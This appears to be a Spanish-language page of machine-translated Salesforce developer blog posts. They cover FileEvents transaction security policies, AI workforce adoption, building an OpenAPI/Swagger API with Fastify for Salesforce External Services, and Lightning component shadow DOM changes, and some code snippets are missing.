Siempre que un usuario de Salesforce intente cargar, obtener una vista previa o descargar un archivo a través de la interfaz de usuario o la API, se producirá un FileEvent en el backend. Este evento está incluido en la función Supervisión de eventos en tiempo real de Salesforce, y los desarrolladores de Salesforce pueden optar por habilitar la transmisión o el almacenamiento para FileEvents como cualquier otro evento asociado con la Supervisión de eventos en tiempo real. Además, los desarrolladores pueden configurar una política de seguridad de transacciones para FileEvents, lo que les permite realizar un seguimiento y tomar medidas en función de las acciones del usuario en los archivos.

Estamos emocionados de ver que FileEvents se convierte en GA en el lanzamiento de Summer '23 . En esta publicación, le mostraremos cómo puede crear una política de seguridad de transacciones sobre un FileEvent y fortalecer la seguridad de los archivos.

Nota: FileEvents está disponible para los clientes que compraron suscripciones complementarias de Salesforce Shield o Salesforce Event Monitoring.

¿Por qué es importante la seguridad de archivos de Salesforce?

Para comprender FileEvents, es importante comprender primero la importancia de la seguridad de archivos en la organización de Salesforce. Salesforce almacena una amplia gama de información como archivos, incluidos los datos de contacto del cliente, los datos de ventas, las notas de las interacciones con los clientes y las solicitudes de servicio, así como documentos internos como contratos, materiales de marketing y especificaciones de productos. Además, el sistema puede almacenar archivos relacionados con transacciones financieras como facturas u órdenes de compra.

El propósito de Salesforce Files es mantener todos estos datos en una ubicación central, para que varios usuarios puedan acceder a ellos fácilmente a la vez, mejorando así la colaboración y la productividad. Es fundamental priorizar la protección de estos archivos para garantizar la seguridad de la información confidencial en su organización de Salesforce. Esto no puede ser enfatizado suficientemente.

¿Qué puede hacer FileEvents?

Cuando los empleados renuncian a su trabajo, normalmente continúan trabajando durante un breve período de tiempo antes de abandonar la empresa. En esta situación, muchas empresas restringen el acceso a archivos confidenciales durante este período previo a la salida. Se puede implementar una política de seguridad de transacciones utilizando FileEvents para evitar que los empleados descarguen archivos etiquetados como "legales" con fines de cumplimiento.

Suposición

Su organización tiene una licencia complementaria de Salesforce Shield o Event Monitoring
Los archivos que los usuarios intentan descargar tienen una etiqueta legal

Veamos cómo puede implementar una política de seguridad de transacciones utilizando eventos de archivo.

Configuración → Políticas de seguridad de transacciones
Haga clic en Nuevo y seleccione Apex

En el menú desplegable "Evento", seleccione FileEvent . Y en el menú desplegable Clase de Apex, seleccione Nueva clase de Apex vacía y luego haga clic en el botón Siguiente .

En la selección Acciones , podemos elegir Mensaje predeterminado o Mensaje de bloqueo personalizado. Lo mismo se aplica al contenido de las notificaciones por correo electrónico. Asegúrese de que el estado de la política esté habilitado.

Ahora, la clase estándar de Apex se ha creado automáticamente.

El fragmento de código siguiente incluye lógica para satisfacer las necesidades de cumplimiento. Actualice la clase con este fragmento de código.

¡Gran trabajo! Veámoslo todo en acción

Inicie sesión como usuario e intente descargar el archivo que está etiquetado como "Legal".

La capacidad de descargar los archivos se ha restringido debido a la política que creamos.

Conclusión

Ahora que FileEvents está disponible en general, es más fácil que nunca configurar políticas de seguridad de transacciones para administrar archivos. Al aprovechar estos eventos, puede monitorear y responder a la actividad en tiempo real, detectar comportamientos sospechosos rápidamente e identificar con precisión amenazas potenciales antes de que se conviertan en un problema.

Además, aprovechar las capacidades de automatización, como alertas o notificaciones automáticas cuando ocurren ciertas actividades en archivos dentro de su organización, ayudará a garantizar que cualquier actividad maliciosa se identifique de inmediato para que se puedan tomar las contramedidas adecuadas de inmediato.

Está claro por qué mantener seguros los documentos confidenciales dentro de un sistema de archivo seguro debe ser una prioridad para cualquier empresa que utilice una plataforma de CRM como Salesforce. En conclusión, comprender FileEvents es esencial para mejorar la seguridad de su organización de Salesforce.

Sobre el Autor

Jagan Padmanabhan es Arquitecto Técnico (Grupo de Éxito del Cliente) en Salesforce con un enfoque especial en la creación de aplicaciones seguras a gran escala. Le apasiona desarrollar aplicaciones utilizando productos basados en la seguridad como Salesforce Shield y Event Monitoring. Además, contribuye activamente a la seguridad de la plataforma como investigador de seguridad. Síguelo en LinkedIn .

Obtenga las últimas publicaciones de blog de desarrolladores de Salesforce y episodios de podcast a través de Slack o RSS.

Agregar a Slack Suscríbete a RSS

Seguir leyendo

Actividad admin administrador Alertas AMA apex API Aplicaciones Architect Arquitecto Automatización Blogs Business CI cli cola Cómo Comunidad contacto Correo electrónico CRM Data Datos desarrollador Desarrolladores desarrolladores de Salesforce Dev Developers EGA Futura Empresa Empresas Evento Eventos FileEvents Force.com ga grupo html INCLUYE interfaz de usuario Lead Marketing Ohana PCI Plataforma Podcast Product Productividad Producto productos REST Salesforce Salesforce File Salesforce Shield Salesforce.com security seguridad Seguridad e identidad Slack Summer '23 Tema TI Tutoriales UI Ventas

Cómo acelerar su éxito en la era de la IA

En el panorama en rápida evolución de la IA generativa , su verdadero potencial radica en cómo la gente la usa. Para tener éxito, las organizaciones deben adoptar una estrategia centrada en el ser humano que integre cuidadosamente la IA en la fuerza laboral . Este enfoque conecta a las personas con la nueva tecnología de inteligencia artificial para abordar las necesidades de los clientes, reducir los desafíos y generar valor rápidamente. Las organizaciones pueden lograr una mayor satisfacción de los clientes y empleados incorporando características mejoradas de IA, mejorando el rendimiento y el crecimiento y aumentando la adopción.

La realidad es que un número significativo de esfuerzos de transformación se quedan cortos. Las encuestas revelan que un asombroso 70 % de tales iniciativas fallan , lo que lleva a una implementación y adopción lentas de nuevas herramientas, obstáculos para el uso de la tecnología y resistencia a nuevas formas de trabajar. A menudo, esta falla se deriva de la falta de enfoque en la intersección crítica entre la tecnología y las personas. Pero no tiene por qué ser así.

Descubre IA + Datos + CRM con Fase 0

Los servicios profesionales de Salesforce lo ayudarán a crear un plan estratégico para el éxito a largo plazo y lo ayudarán a beneficiarse de los rápidos avances tecnológicos.

A medida que navegamos por esta nueva era, debemos cambiar nuestra mentalidad y adoptar las tendencias emergentes, los datos, los conocimientos del mercado y las abundantes oportunidades que presenta la IA. Explore las consideraciones clave para guiarlo en el camino hacia el éxito. Empodérate para navegar el poder transformador de la IA y crea un futuro donde la innovación y el potencial humano converjan sin problemas.

¿Cómo es adoptar un enfoque centrado en el ser humano para la adopción de IA? Depende de su organización y su progresión, ya que cada cultura es diferente. Sin embargo, hay ciertos aspectos del cambio que puede anticipar:

Coloque a las personas y su comprensión al frente de la transformación.
Alinear los resultados en función de las necesidades y objetivos específicos de esas personas.
Promover la inclusión y la adaptabilidad para abordar los diversos factores que dan forma al panorama en constante cambio.

La implementación de IA en la fuerza laboral y la cultura organizacional es una tarea compleja que abarca varios desafíos. Sin embargo, navegar este cambio puede desbloquear beneficios sustanciales. AI ofrece una nueva forma de ver el trabajo y su impacto se extenderá más allá de lo que esperamos hoy. Aborda tu transformación digital con los cinco elementos del marco de éxito del cliente de Salesforce para ser ágil frente a este nuevo estándar.

Adopte la flexibilidad para construir IA en la fuerza laboral más rápido

La IA se está desarrollando de manera rápida y difícil de predecir, por lo que planificar en torno a un punto final determinado no es una estrategia eficaz. En cambio, podemos construir los cimientos para fuerzas de trabajo preparadas para la IA que aprovechen tantas oportunidades como sea posible.

En resumen: ser una fuerza laboral lista para el cambio es ser una fuerza laboral lista para la IA.

Al adoptar una mentalidad basada en los resultados, las organizaciones desbloquean su potencial para conectarse con los clientes y lograr sus objetivos comerciales principales. Estos cambios ofrecen grandes beneficios, como ahorrar dinero a través de nuevas formas de trabajar.

Estos cambios son más exitosos cuando la centralidad humana es un enfoque principal, considerando cómo las personas experimentan el cambio. La innovación continua es clave para la evolución de la tecnología, asegurando que se alinee con las necesidades y expectativas en constante evolución de las personas y las organizaciones.

Lo que recomendamos:

Cultiva las habilidades de IA de tu equipo.
Fomente una cultura adaptativa dentro de su lugar de trabajo fomentando la experimentación.
Cree un marco de aprendizaje estructurado proporcionando recursos y una hoja de ruta clara para una utilización eficaz.
Utilice la narración para visualizar el futuro del trabajo.
Comience a evaluar la preparación para el cambio.

Fomentar la estabilidad para una fuerza laboral resiliente

Los líderes tienen un papel importante en la formación de la mentalidad organizacional y en el cultivo de un entorno seguro que permita a las personas buscar el crecimiento. Abra la puerta al aprendizaje de nuevas tecnologías y formas de trabajar como una habilidad fundamental para la innovación y el cambio.

Al comprender y empatizar con la respuesta emocional y humana a esta tecnología innovadora, podemos encontrar un camino claro para desbloquear su potencial más rápidamente.

Tome este enfoque:

Promueva la seguridad psicológica para ayudar a los equipos a desarrollar una mentalidad de principiante.
Proyecte una visión del estado futuro que incluya a todos.
Fomente un entorno que enfatice el aprendizaje continuo y reformule las nuevas herramientas habilitadas para IA.
Pida a los empleados que identifiquen partes de su trabajo que podrían automatizarse o aumentarse con IA.
Reconocer los primeros esfuerzos para adoptar nuevas tecnologías.

Genere confianza para una adopción tecnológica exitosa

Si sus empleados tienen reservas acerca de las nuevas tecnologías, es esencial abordar sus inquietudes para fomentar la aceptación y el entusiasmo. Generar confianza se convierte en un factor clave en este proceso, ya que el tema de las conversaciones en torno a la IA puede generar incertidumbre . Trate de aliviar estos temores mediante el desarrollo de una estrategia para introducir nuevas tecnologías a su fuerza laboral y empoderarlos con las habilidades necesarias.

Lograr una alineación , donde todos estén unidos en torno a un objetivo común, es crucial. Al poner énfasis en alinear la comunicación sobre el cambio y fomentar una comprensión clara de sus beneficios, influimos en cómo las personas reaccionan y adoptan las iniciativas de transformación.

Lo que puedes hacer:

Aborde las nuevas tecnologías como mejoras de la productividad en lugar de un reemplazo de la fuerza laboral.
Escuche y aborde temores específicos proporcionando mecanismos de retroalimentación adaptados a las inquietudes de sus clientes o equipo.
Implemente oportunidades de mejora de habilidades de inmediato.
Incluya a sus equipos en la toma de decisiones para que puedan adaptarse al panorama cambiante.
Proporcione una alternativa transparente y creíble para el futuro dentro de su equipo.

Impulse la transformación continua con
La Oficina de Innovación Continua

Los servicios profesionales de Salesforce pueden ayudarlo a elevar sus capacidades para obtener el máximo valor de su inversión en Salesforce.

Aumente la colaboración con una mentalidad de plataforma

Las organizaciones, como las personas, tienen una mentalidad de plataforma que influye en su respuesta al cambio. Algunos equipos aceptan el cambio y priorizan el crecimiento, mientras que otros se sienten más cómodos manteniendo el statu quo.

Cuando las organizaciones adoptan una mentalidad de plataforma, van más allá de ver la IA como una herramienta independiente y, en cambio, crean un entorno que fomenta las conexiones de los usuarios, el intercambio de conocimientos y el progreso colaborativo. Al comprender qué distingue a su plataforma y cómo los usuarios pueden obtener el máximo beneficio de ella, las organizaciones pueden utilizar mejor el verdadero poder de la IA en la fuerza laboral.

Intenta hacer esto:

Resalte los beneficios, la colaboración, los procesos simplificados y la innovación para enfatizar el valor de la IA.
Fomentar el intercambio, la creación de redes, el aprendizaje y el intercambio de ideas entre los usuarios.
Proporcione recursos integrales para ayudar a los usuarios a navegar y usar la plataforma de manera efectiva.
Busque comentarios, itere en función de las necesidades de los usuarios y manténgase a la vanguardia para mejorar continuamente su plataforma.

Aprovecha las oportunidades que te esperan

El cambio ocurre a la velocidad de las personas y, en la era de la IA, el ritmo de la transformación se ha acelerado exponencialmente. La oportunidad de aprovechar la IA e impulsar la innovación surge más rápido que nunca, brindando a las organizaciones una oportunidad única de mantenerse a la vanguardia y obtener una ventaja competitiva.

Descubra el potencial que tiene por delante y prepárese para el futuro. Conéctese con los servicios profesionales de Salesforce hoy para analizar sus objetivos de transformación únicos y explorar cómo nuestra experiencia puede ayudarlo a adoptar con éxito la IA en la fuerza laboral.

Seguir leyendo

ai AMA CI cli cola Cómo Conectar Conocimiento Crecimiento CRM Datos Desarrollo EGA Futura Encuesta Estrategia Force.com ga Herramientas INCLUIR inclusión INCLUYE inteligencia inteligencia artificial intercambio de ideas la oportunidad Lead LEx Negocios Oportunidad Otros PCI Plataforma Proceso Product Productividad Quip Rendimiento Respuesta Salesforce Salesforce.com seguridad Tarea Tecnología Tema TI transformación digital UI Versión

Diseñe una API Swagger con código para traer datos a Salesforce ☁️

El enlace a la publicación original, lo encontrarás al final de este artículo.

…

Diseñe una API de Swagger con código para llevar datos a Salesforce | Blog de desarrolladores de Salesforce

La integración de una API externa con su organización de Salesforce puede ser una tarea sencilla que no requiere código si utilizaCredenciales con nombre y Servicios externos . Deberá crear una credencial con nombre que apunte a la API y configurar un servicio externo en la interfaz de usuario de configuración. La clave aquí es proporcionar una especificación OpenAPI para la API. Si la API no tiene una, puede diseñarla usted mismo manualmente usando YAML o JSON, usar MuleSoft Anypoint Platform o aprovechar las herramientas y el código de código abierto.

En esta publicación, le presentaremos la especificación OpenAPI y Swagger, discutiremos los elementos principales de la especificación y lo guiaremos a través del diseño e implementación de una API con código. Usaremos Node.js y Swagger dentro del marco Fastify para esta tarea. Finalmente, integraremos esta API con Salesforce.

OpenAPI y Swagger

OpenAPI es una especificación para diseñar y construir API. Proporciona una forma estandarizada de definir su API para otros, brindando una forma estructurada que incluye puntos finales, tipos de solicitud/respuesta, definiciones de esquema, métodos de autenticación y más. Las especificaciones de OpenAPI están escritas en formatos YAML o JSON, ambos fáciles de leer y escribir. Esta especificación es ampliamente adoptada y respaldada por una variedad de herramientas, lo que la convierte en una opción popular para diseñar y documentar API. De hecho, si desea importar una API a Salesforce utilizando servicios externos, deberá especificarse con OpenAPI. Además, Salesforce es miembro de la Iniciativa OpenAPI .

Nota: A la fecha de esta publicación, la versión actual de la especificación OpenAPI es 3.1.0.

Swagger , por otro lado, es un conjunto de herramientas ( la mayoría de código abierto ) para implementar la especificación OpenAPI. Incluye la interfaz de usuario de Swagger, que proporciona una interfaz gráfica para comprender y probar las API, y Swagger Codegen, que genera código SDK de cliente y apéndices de servidor a partir de una especificación OpenAPI.

La especificación OpenAPI v2 también se conoce como Swagger, pero su nombre cambió cuando se convirtió en parte de la iniciativa OpenAPI en 2016.

Estructura básica de la especificación OpenAPI

La especificación OpenAPI está organizada en las siguientes secciones clave:

API abierta	Define el documento raíz y combina la lista de recursos y la declaración de la API. Requerido
Información	Proporciona metadatos sobre la API, como el título, la descripción, los términos del servicio, la información de contacto, etc. Obligatorio
Servidores	Especifica una o más URL base para su API, como producción o preparación.
Seguridad	Define un esquema de seguridad que pueden utilizar las operaciones de la API.
Caminos	Describe las rutas y operaciones disponibles para la API. Cada ruta tiene un método HTTP con los detalles de la operación.
Etiquetas	Agrega metadatos a una sola etiqueta que utiliza el objeto de operación.
Documentos externos	Proporciona una descripción y una URL para la documentación externa.
Componentes	Define un conjunto de objetos reutilizables para diferentes aspectos de la API. Esto puede incluir esquemas, respuestas, parámetros, ejemplos, cuerpos de solicitud, encabezados, esquemas de seguridad, etc.

Para obtener una explicación más detallada de cada sección y sus correspondientes definiciones de objeto, consulte la documentación oficial de la especificación OpenAPI .

Para fines de demostración, crearemos una API para administrar una librería. Esta API contará con dos métodos HTTP: uno para enumerar los libros disponibles y otro para agregar nuevos libros. A continuación, encontrará una definición básica de esta API, centrándose en el método para listar libros ( GET /books ) y sus objetos de respuesta.

Tenga en cuenta que estamos usando tres secciones principales aquí: Información , Rutas y Componentes . Como se mencionó anteriormente, describiremos esta API a medida que la implementemos mediante código. Para este propósito, utilizaremos Fastify y Fastify Swagger.

Fastify y Fastify Swagger

Fastify es un marco web altamente eficiente y flexible para Node.js. Está diseñado para facilitar su uso y ofrecer la máxima velocidad sin comprometer la personalización. Fastify proporciona una base sólida para las aplicaciones web y las API, con funciones como la validación de solicitudes y respuestas basadas en esquemas, ganchos, complementos y registro automático. Una de sus principales ventajas radica en su ecosistema, que incluye numerosos complementos centrales y mantenidos por la comunidad.

Uno de estos complementos es fastify-swagger . Este complemento nos permite ofrecer definiciones de Swagger (OpenAPI v2) u OpenAPI v3, que se generan automáticamente a partir de sus esquemas de ruta o de una definición existente de Swagger/OpenAPI. Además, utilizará fastify-swagger-ui , un complemento que sirve una instancia de Swagger UI dentro de su aplicación.

Nota: La siguiente demostración requiere la instalación de Node.js LTS y, a la fecha de esta publicación de blog, la última versión es v18.16.0.

Comencemos a crear la API de su librería instalando Fastify CLI y generando un nuevo proyecto ejecutando:

Luego, vayamos a la carpeta del proyecto e instalemos las dependencias fastify-swagger y fastify-swagger-ui .

Nota: En esta demostración, se centrará en tres aspectos principales: agregar compatibilidad con Swagger a Fastify, definir rutas de API y delinear esquemas y tipos de respuesta. No explicaremos cómo integrar la API con una base de datos. Si está interesado en explorar la fuente completa del proyecto, está disponible en el repositorio de ejemplos de codeLive.

Agreguemos compatibilidad con Swagger a Fastify editando el archivo app.js , luego importemos Swagger y SwaggerUI y registrémoslos como complementos.

aplicación.js

En la configuración del complemento de Swagger, tiene la opción de pasar toda la definición de especificación de OpenAPI, o puede aprovechar el enfoque dinámico que ofrece el complemento. Para esta demostración, utilizará el enfoque dinámico. Dado que el único campo obligatorio es info , definirá los metadatos de su API allí, además, la sección refResolver se encarga de nombrar las referencias de definición de esquema.

Y para SwaggerUI, solo especifica la ruta donde se alojará el sitio de documentación.

Ahora vamos a crear una carpeta schemas . Aquí es donde definirá los esquemas de su API. Para esta demostración, definirá un esquema book y un esquema error .

esquemas/index.js

Los esquemas representan la estructura de los objetos con los que trabajará, tanto para los cuerpos de solicitud como para los de respuesta. Para la especificación OpenAPI, el complemento Swagger agregará automáticamente estos objetos en el campo components .

Finalmente, definamos las rutas API para GET /books y POST /books usando Fastify. Primero, deberá registrar los esquemas dentro de Fastify. Luego, especificará los objetos de respuesta y solicitud para cada ruta que haga referencia a esos esquemas.

rutas/root.js

{ // … look at the code repository for a complete implementation } ) // POST /books fastify.post( ‘/books’, { schema: { description: "Create a book", body: { $ref: ‘book#’, required: [‘author’, ‘title’] }, response: { 201: { description: ‘Returns the book that has been created’, $ref: ‘book#’ }, 500: { description: ‘Returns an error’, $ref: ‘error#’ } } } }, async (request, reply) => { const { title, author } = request.body const id = randomUUID() const client = await fastify.pg.connect() try { const { rows: books } = await client.query( ‘INSERT INTO books(id, title, author) VALUES($1, $2, $3) RETURNING *’, [id, title, author] ) const [newBook] = books reply.code(201).send(newBook) } catch (error) { reply .status(500) .send({ code: 500, message: `An error ocurred: ${error.message}` }) } finally { client.release() } } ) // GET / fastify.get(‘/’, { schema: { hide: true } }, async function (request, reply) { reply.status(301).redirect(‘/api-docs’) })
} «>

Analicemos la ruta POST /books :

La función fastify.post define el método HTTP.
El primer argumento especifica la ruta: /books.
El segundo argumento especifica el schema , que incluye el body : el objeto de carga útil que espera la API. (Tenga en cuenta que es una referencia al esquema del book ). También incluye varios objetos response para esa ruta, que se asignan a los códigos de estado HTTP correspondientes 201 y 500 .
El tercer argumento es la implementación de la ruta. En este caso, está insertando el objeto en la base de datos y devolviendo el nuevo objeto. Si este proceso falla, devolverá un objeto de error. Es importante tener en cuenta que está utilizando los mismos esquemas que definió anteriormente.

Nota: También tiene la opción de excluir ciertas rutas de la documentación pasando hide: true en el objeto de esquema de esa ruta específica, como se demuestra en GET / route.

Su API está lista, así que ejecútela localmente para echar un vistazo a la interfaz de SwaggerUI ejecutando:

Y navegue a http://localhost:3000/api-docs para ver las diferentes rutas, su documentación y tener una forma de probarlas directamente desde la interfaz.

Si desea probarlo e implementarlo en Heroku, asegúrese de actualizar el script start en el archivo package.json con lo siguiente.

Además, asegúrese de tener acceso a una base de datos Heroku PostgreSQL y cree el esquema de la base de datos ejecutando:

<dx-code-block title language code-block="heroku pg:psql

Nota: El archivo database.sql está disponible en el repositorio de ejemplos de codeLive.

Luego puede implementarlo ejecutando:

Si desea ver cómo se ve implementado, vea mi versión que se ejecuta en Heroku .

Integración de una API externa con Salesforce

Ahora que tiene una API de acceso público, integrémosla con Salesforce como un servicio externo.

Primero, deberá crear una credencial con nombre para esta API. En la interfaz de usuario de configuración, vaya a Seguridad > Credenciales con nombre y cree una credencial externa con un protocolo de autenticación personalizado y una entidad de seguridad.

Asegúrese de que la credencial externa tenga una entidad principal a la que le haya asignado permisos en Acceso principal de credenciales externas en su conjunto de permisos.

Luego, cree una credencial con nombre que haga referencia a la credencial externa con la URL que apunta a la API pública.

A continuación, vaya a Integraciones > Servicios externos y agregue un nuevo servicio externo desde una especificación de API, seleccione la credencial con nombre y configure la ruta relativa a la ruta de especificación de OpenAPI. En su demostración, será /api-docs/json .

Después de eso, guarde sus cambios y seleccione las operaciones que desea importar a Salesforce, revise las operaciones y finalice.

Como puede ver, las operaciones que ha seleccionado se han importado correctamente, especificando tanto los parámetros de entrada como los de salida.

Ahora podrá invocar este servicio externo desde Flow, Apex, Einstein Bots y OmniStudio.

Conclusión

OpenAPI y los servicios externos de Salesforce brindan una poderosa combinación para integrar API externas en su organización de Salesforce. Al aprovechar el enfoque estandarizado de OpenAPI para definir las API y la capacidad de Salesforce para consumir fácilmente estas definiciones e invocarlas desde soluciones de código bajo y pro-código, los desarrolladores como usted pueden optimizar el proceso de conexión a servicios externos y mejorar las capacidades de sus aplicaciones de Salesforce.

Si está interesado en obtener más información sobre los servicios externos , puede encontrar una lista de recursos de aprendizaje a continuación, incluidos videos que muestran cómo invocarlos desde Flow y Apex.

Recursos de aprendizaje

Sobre el Autor

Julián Duque es un defensor principal de desarrolladores en Salesforce, donde se enfoca en Node.js, JavaScript y desarrollo backend. Le apasiona la educación y el intercambio de conocimientos y ha estado involucrado en la organización de comunidades tecnológicas y de desarrolladores desde 2001.

Sígalo en Twitter @julian_duque, @julianduque.co en Bluesky social o LinkedIn.

Obtenga las últimas publicaciones de blog de desarrolladores de Salesforce y episodios de podcast a través de Slack o RSS.

Agregar a Slack Suscríbete a RSS

Seguir leyendo

admin administrador ai AMA apex API apis Aplicaciones aplicaciones de salesforce Arquitecto Blogs CI cli CodeLive Código abierto código bajo Cómo Comunidad Comunidades conexión Connect Conocimiento contacto cuenta Data Datos desarrollador Desarrolladores desarrolladores de Salesforce Desarrollo Dev documentación EGA Futura Einstein Einstein Bots ERP flow Force.com Funciones ga Heroku Herramientas html INCLUDE INCLUIR INCLUYE inicio integración Integración y APIs Integraciones interfaz de usuario java javascript json LEx MuleSoft MuleSoft Anypoint Platform node.js Objeto Ohana Otros PCI Podcast postgres Proceso Registro Respuesta Respuestas Salesforce Salesforce.com SDK seguridad servicios externos Slack sql Swagger Tarea Tecnología Tema TI Tutoriales twitter UI Versión

Cambios en la estructura del DOM interno del componente Lightning base para compatibilidad futura con sombras nativas ☁️

El enlace a la publicación original, lo encontrarás al final de este artículo.

…

Cambios en la estructura del DOM interno del componente Lightning base para la futura compatibilidad con sombras nativas | Blog de desarrolladores de Salesforce

Salesforce está preparando los componentes base de Lightning para adoptar Shadow DOM nativo , lo que mejorará el rendimiento de los componentes y los alineará mejor con los estándares de los componentes web. Como parte de esta fase de preparación, hemos cambiado la estructura DOM interna de algunos de nuestros componentes. Recién comenzamos y continuaremos modificando las partes internas de los componentes en versiones posteriores. En esta publicación, discutiremos qué cambiará y cómo puede prepararse para ello.

¿Qué es el DOM de sombra nativo?

Shadow DOM es un estándar web que encapsula la estructura del modelo de objeto de documento (DOM) interno de un componente web. Esto nos da la capacidad de proporcionarle componentes robustos y seguros protegiéndolos de ser manipulados por HTML, CSS y JavaScript arbitrarios.

Actualmente, Salesforce mantiene un polyfill de sombra sintético para navegadores heredados, como versiones anteriores de Microsoft Edge, pero ahora que todos los principales navegadores admiten DOM de sombra nativo, estamos preparando nuestros componentes para hacer lo mismo.

Con la introducción del shadow DOM nativo, mejoraremos la encapsulación de los componentes, haciéndolos más consistentes y seguros, y brindaremos una forma más predecible de diseñarlos. Esto resolverá una gran cantidad de problemas de compatibilidad con versiones anteriores y alineará los componentes web Lightning con los estándares web.

Sin embargo, puede provocar una fase de adaptación a medida que hacemos el cambio.

La implementación interna de los componentes básicos está cambiando

Hemos estado trabajando en la preparación de nuestros componentes base para adoptar el shadow DOM nativo. Los escenarios específicos en los que se rompía la encapsulación de los componentes base requerían que creáramos un nuevo elemento contenedor dentro del límite de la sombra. Para ayudar a ilustrar esto, veamos un componente base de ejemplo llamado lightning-foo . Antes, el componente se veía así:

<dx-code-block title language code-block="

Example base component

«>

A partir de Summer '23, se verá así:

<dx-code-block title language code-block="

Example base component

«>

La mecánica interna de los componentes básicos no se diseñó para acceder directamente y tratarse como una API confiable para su uso. En cambio, nuestros componentes preempaquetados estaban destinados a usarse tal como son, utilizando las API públicas oficiales que hemos compartido abiertamente. Sin embargo, sabemos que algunos clientes están utilizando componentes internos de manera no documentada. Si está accediendo a los elementos internos de un componente base con fines de personalización y prueba, tenga en cuenta estos cambios.

¿Cómo puede arreglar su código personalizado y sus pruebas?

Al probar manualmente sus aplicaciones, es posible que detecte un componente personalizado que funcionaba anteriormente y que no tiene el aspecto esperado. Debido a estos cambios, sus pruebas automatizadas de un extremo a otro también pueden fallar. En ambos casos, puede significar que su código personalizado o código de prueba depende de las partes internas de un componente base que ha cambiado . Exploremos estos dos problemas con más profundidad:

Un componente no se ve como se esperaba:

Problema: Intentar diseñar el elemento o las clases personalizadas dentro de un componente base puede generar resultados imprevistos.
Solución: El cambio de sombra sintética a componentes totalmente encapsulados con DOM de sombra nativo puede cambiar su estrategia de CSS. Al migrar sus personalizaciones de estilo a la sombra nativa, siga estos pasos:
- Consulte la disponibilidad de un gancho para peinar . Ofrecen un excelente método para adaptar un componente sin profundizar en las complejidades del CSS subyacente o el shadow DOM.
- Asegúrese de que el valor que está aplicando al gancho de estilo esté vinculado a su sistema de diseño en lugar de un valor fijo y predefinido. Evite usar un valor codificado.

Una prueba de extremo a extremo falla:

Problema: Cualquier implementación que use combinadores CSS fallará. Por ejemplo, lightning-foo > p no coincidirá con nuestro marcado actualizado.
Solución: Los combinadores hacen que el CSS sea frágil y deben evitarse a menos que se usen por una buena razón. La mayoría de las veces, los combinadores se pueden eliminar sin ninguna regresión. Si se desea un elemento específico, se pueden usar otros métodos de orientación que no se basen en el marcado que nunca cambia. Es decir, evite apuntar explícitamente a elementos HTML siempre que sea posible. Use otros selectores disponibles, como clases que permiten que su uso de CSS sea abstracto, modular y separado del elemento HTML. Si sus pruebas se basan en combinadores de CSS, le recomendamos que adopte el Modelo de automatización de pruebas de interfaz de usuario (UTAM) para evitar cambios importantes en el futuro, ya que los objetos de la página se mantienen actualizados con todos los cambios de componentes.

Conclusión

En resumen, estamos logrando avances significativos al preparar los componentes base de Lightning para adoptar Shadow DOM nativo, lo que garantizará un mejor rendimiento y la alineación con los estándares de los componentes web, además de mejorar la seguridad y la confiabilidad de los componentes. Al encapsular la estructura DOM interna, nos esforzamos por brindar una experiencia más sólida y predecible tanto para los desarrolladores como para los usuarios.

Si bien estos cambios pueden presentar algunos desafíos iniciales, son pasos necesarios hacia un sistema más estandarizado y preparado para el futuro. Seguimos comprometidos a informar y apoyar a los desarrolladores durante esta transición.

En preparación para estos cambios, recomendamos adoptar ganchos de estilo y métodos de orientación como clases para garantizar que el uso de CSS siga siendo modular y adaptable. Además, recomendamos enfáticamente adoptar UTAM como su solución de prueba de extremo a extremo.

Estén atentos a más actualizaciones y cambios a medida que Salesforce continúa optimizando y mejorando el marco de componentes Lightning. Al adoptar estas próximas mejoras, los desarrolladores pueden esperar una experiencia de desarrollo más fluida y eficiente mientras crean aplicaciones poderosas en la Plataforma Salesforce.

Más recursos

Sobre los autores

Maeve Tuntivate es Gerente sénior en el equipo de Gestión de productos en Salesforce.

Jesse Brack es ingeniero principal de UX en el equipo de ingeniería de sistemas de diseño de Salesforce.

Obtenga las últimas publicaciones de blog de desarrolladores de Salesforce y episodios de podcast a través de Slack o RSS.

Agregar a Slack Suscríbete a RSS

Seguir leyendo

admin administrador AMA Anuncios API Aplicaciones Arquitecto Automatización Automatización de pruebas Blogs CI cli Cómo Componente Lightning componentes base lightning Componentes Web Lightning Comunidad CRO css cuenta desarrollador Desarrolladores desarrolladores de Salesforce Desarrollo Dev Developers EGA Futura Estrategia Force.com ga ganchos de estilo Genie html integración y API interfaz de usuario java javascript Lead Lightning Lightning Web Components lwc Marca Objeto Ohana Otros Performance Plataforma Plataforma Salesforce Podcast Product Producto productos Prueba pruebas Quip Rendimiento Salesforce Salesforce Platform Salesforce.com seguridad SEPA Shadow DOM Slack Summer '23 Tema Temas TI UI UTAM Versiones

Etiqueta: seguridad

Gran idea o pregunta duradera:

Objetivos:

Experiencia en la nube

Las mayores ventajas de Experience Cloud:

Contras de Experience Cloud:

¿Puede el desarrollo personalizado superar las limitaciones de Experience Cloud?

Ventajas del desarrollo personalizado:

Desventajas del desarrollo personalizado:

¡Haciéndolo todo con la plataforma de experiencia digital de Titan!

Puntos ganadores de Titán:

Ahora, echemos un vistazo a las desventajas de Titan:

Comparación de Experience Cloud frente a la competencia

Prueba de concepto

Evaluación formativa

Los socios de Salesforce comparten sus opiniones sobre la IA

Allanando un camino confiable hacia el valor de la IA

Adoptar un ecosistema de confianza

Recibe artículos seleccionados solo para ti, en tu bandeja de entrada

Innovando a través de la colaboración

Mejore la productividad de la empresa con Einstein

Aprovechando el poder de Einstein

Encontrar el éxito de los socios y el valor de la IA

Requisitos previos

Crear una aplicación conectada

Configura tus secretos de GitHub Actions

Crear una canalización de CI/CD

Modifica tu configuración de Maven

ejecutar la tubería

Conclusión

Recursos adicionales

Sobre el Autor

Obtenga las últimas publicaciones de blog y episodios de podcasts para desarrolladores de Salesforce a través de Slack o RSS.

¿Cómo creo aplicaciones impulsadas por IA con LLM?

Entrena tu propio modelo

Personaliza un modelo de código abierto

Utilice modelos existentes a través de API

Creación de aplicaciones impulsadas por IA utilizando modelos existentes a través de API

Llamada API básica

Puesta a tierra del LLM

Construcción rápida y puesta a tierra dinámica.

Plantillas de aviso

Estudio rápido

Capa de confianza de Einstein

De cara al futuro: creación de aplicaciones de una forma totalmente nueva

Encadenamiento rápido

Orquestación de IA

Resumen

Sobre el Autor

Obtenga las últimas publicaciones de blog y episodios de podcasts para desarrolladores de Salesforce a través de Slack o RSS.

#1 — Aplicación de CRUD/FLS

¿Qué es esto?

¿Cómo puedo abordar esto?

#2 – Versión de software insegura

¿Qué es esto?

¿Cómo puedo abordar esto?

#3 – Violación al compartir

¿Qué es esto?

